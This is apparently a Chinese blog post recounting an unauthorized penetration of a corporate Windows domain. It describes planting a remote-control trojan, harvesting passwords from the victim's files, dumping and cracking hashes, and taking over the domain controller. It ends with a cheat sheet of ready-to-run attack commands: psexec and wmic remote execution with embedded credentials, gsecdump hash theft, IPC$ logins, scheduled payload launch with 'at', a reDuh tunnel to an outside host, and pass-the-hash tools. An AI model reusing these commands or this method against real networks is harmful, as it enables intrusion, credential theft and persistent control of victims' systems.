推荐使用这样的方式输入账号和密码,为什么?如果用户名存在空格,你这样输会保险些。什么 域用户不能存在空格? 是的,以前我也认为不会,微软的讲师也说不会,不过,经过我的测试和经验,那是假的,域 完全可以空格,除了 user name 这样的,还可以存在 user na me ,不信 你可以试试。 建立IPC后,你只是想COPY文件 或者 RAR文件 再或者种马 那就是你的自由了。 后话:最近因为在渗域,在渗透过程中,也确实出现一些问题,几次都是不知如何进行,其实在技术上,并没有什么障碍。主要是在于对方有着比较强的主防御,而 我的远控最开始连CMD都无法执行,后经过几天的环境测试,突破了CMD。有了CMD后,进行了查询,获得了一些信息,就开始了往下的渗透,被控机器的密 码我不是跑出来的,我是翻他的文件翻出他常用密码的。因为他没有使用域账号,都是以系统账号登陆,所以无法查看域。我只能用他的域账号建立IPC连接,查 找到内网的一个WEB服务,将其渗透后才算拿下了一个稳定的内网机器。 拿下内网WEB服务器后,我就已经完全在域内,没有使用HASH INJECTION,我是先查询了DOMAIN ADMINS,发现WEB服务器上的账号就属于这个组,PW后得到了HASH,破解掉我就连向了域控服务器的IPC$。
连接了IPC$,直接在其SYSYTEM32下扔了一个远控,然后用AT命令将其启动,这期间我尝试了5个SHIFT,但是SHIFT关闭后,我的远控也会掉,所以排除了这种方法,还是用AT来ADD NEW JOB 比较方便。 给域控服务器种了远控,利用CMD来GETHASHES了全部的HASHES进行破解,很幸运的查到了文件管理组的用户,这才有了我后面的目标达成。 总的来说,我这次的渗透比较运气好,中间麻烦事不是太多,不过也花了半个月的时间,时间大部分花在测试防御环境,软件免杀,木马免杀,查找资料这些上面。 后来,我获取了他的网络拓补图,发现我所呆的区域只是一个小小的域,还有好几个域我还没有涉及到,在域的前面是DMZ,而DMZ前面当然是INT了。 已经很晚了,本来是在写一份详细的渗透过程,不过因为一直工作,很多细节没有办法当场记录,所以,暂时在BLOG上写一些能想到的,后面如果有时间有环境,会再补充更多的细节以及图片和在渗透时所遇到的麻烦,如何解决等写出来。
常用命令 net view 查看同一域/工作组的计算机列表 net view /domain 查看域/工作组列表 net view /domain:Secwing 查看Secwing域中 计算机列表 net group /domain 查看所在域的组 net user /domain 查看所在域用户 net user /domain zerosoul 12345678 修改域用户密码,需要域管理员权限,或者Ctrl+Alt+Del点击修改则不需要域管理员权限 net localgroup administrators SECWING\zerosoul /add 域Users组用户添加到本地Administrators组,需要本地管理员或域管理员在本机登陆域后进行 下面的命令 只能用于 域控制器: net group “Domain controllers” 查看域控制器(如果有多台) net group 查看域的组 net group “domain admins” 查看域管理员 net group “domain users” 查看域管理员 PS:打开配置域控制器向导的命令 dcpromo psexec /accepteula 绕过第一次验证窗口 mstsc/admin 解决hash无法抓出问题 wmic /node:172.16.19.96 /user:ABIMAQ\Administrator /password:k78m90 process call create c:\kav\2009.exe psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe 拷贝文件并且执行 psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u 抓取hash net use \\172.16.16.2\IPC$ “k78m90″ /user:”admintitrator” net use \\172.16.16.2\IPC$ “k78m90″ /user:”aABIMAQ\Administrator” net time \\172.16.16.2 at \\172.16.16.2 13:50 2009.exe java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh连接命令 [createTunnel]1234:127.0.0.1:3389 端口转向命令 iam-alt -h user-hash 这样hash就被注入了 whosthere-alt.exe 来查看是否被注入成功。